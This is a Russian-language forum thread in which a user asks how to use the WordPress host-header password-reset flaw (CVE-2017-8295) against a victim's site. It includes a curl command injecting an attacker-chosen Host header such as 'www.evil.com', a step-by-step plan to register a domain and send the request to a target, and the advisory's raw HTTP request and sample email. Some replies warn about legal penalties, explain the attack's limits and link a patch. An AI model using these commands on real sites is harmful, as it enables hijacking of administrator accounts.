Всем привет. Подскажите как воспользоваться уязвимостью Wordpress, описанной здесь: https://wpvulndb.com/vulnerabilities/8807 я так понимаю, что это: curl -H "Host: www.evil.com" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://example.com/wp-login.php?action=lostpassword Команда для терминала в линукс? Что должно быть вместо evil.com ? вместо example.com сайт жертвы? или наоборот? Разъясните пожалуйста.
Всё верно. Команда вводится в терминал Linux, example.com - сайт жертвы. А вот что это за хост evil.com.... В хелпе curl сказано: -H, --header LINE Передача пользовательского заголовка LINE на сервер (H)
cURL кроссплатформенный Вы вообще понимаете, что эта уязвимость дает и какой код должен быть на вашем сайте (evil.com) для проведения атаки?
Я так понимаю, что с помощью этой уязвимости, можно получить письмо для генерации нового пароля от аккаунта сайта (не важно он с правами админа или нет) на свою почту. Не знаю какой код должен быть на сайте вместо evil.com, поэтому я здесь.
С первой попытки не угадали. Попробуйте еще раз. То есть, ничего не знаете, но что-то хотите взломать? А знаете, какой срок дают за то, что вы собираетесь сделать?
Или с помощью этой уязвимости можно подменить email админа при заказе письма по восстановлению пароля? Вот здесь: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html Показано, что письмо по восстановлению пароля приходит от wordpress@attackers-mxserver.com Вместо attackers-mxserver.com может быть любой другой домен. Но перед атакой получается мне нужно создать почту на домене. Порядок действий: 1. Регаю домен. Пусть будет forhackwp.ru 2. Делаю почту wordpress@forhackwp.ru 3. Запускаю Линукс. Пишу в терминал: curl -H "Host: forhackwp.ru" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://тут-домен-жертвы/wp-login.php?action=lostpassword 4. Жду письма на свою почту: wordpress@forhackwp.ru ? Или нет? Вот тут: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html Написано (перевод): Если злоумышленник отправляет запрос, аналогичный приведенному ниже WordPress по умолчанию установка, доступная IP-адрес (IP-основе виртуального хоста): -----[ HTTP Request ]---- POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1 Host: injected-attackers-mxserver.com Content-Type: application/x-www-form-urlencoded Content-Length: 56 user_login=admin&redirect_to=&wp-submit=Get+New+Password ------------------------ WordPress будет вызвать функцию сброса пароля для учетной записи пользователя с правами администратора. Из-за измененного заголовка узла имя_сервера будет присвоено значение имя хоста по выбору злоумышленника. В результате WordPress передаст следующие заголовки и текст сообщения электронной почты /usr/bin / обертка sendmail: ------[ полученная электронная почта ]----- Subject: [CompanyX WP] Password Reset Return-Path: <wordpress@attackers-mxserver.com> From: WordPress <wordpress@attackers-mxserver.com> Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Someone requested that the password be reset for the following account: http://companyX-wp/wp/wordpress/ Username: admin If this was a mistake, just ignore this email and nothing will happen. To reset your password, visit the following address: <http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin> ------------------------------- Как сделать HTTP запрос?
Совета по обновилению WP до последней версии, будет достаточно. Нет. Письмо улетит админу, но в линках и заголовках будет домен атакующего. Так же, должны быть соблюдены условия для успешной эксплуатации.
Сайт должен быть доступен по IP. На хостингах и нормально настроенных серверах не сработает. Последняя версия 4.8.3. Она уязвима, если верить ссылке из первого поста.
Кстати, да. Кривым взлядом, принял патч за обновление Кому нужно, можете пропатчиться: https://core.trac.wordpress.org/attachment/ticket/25239/CVE-2017-8295.patch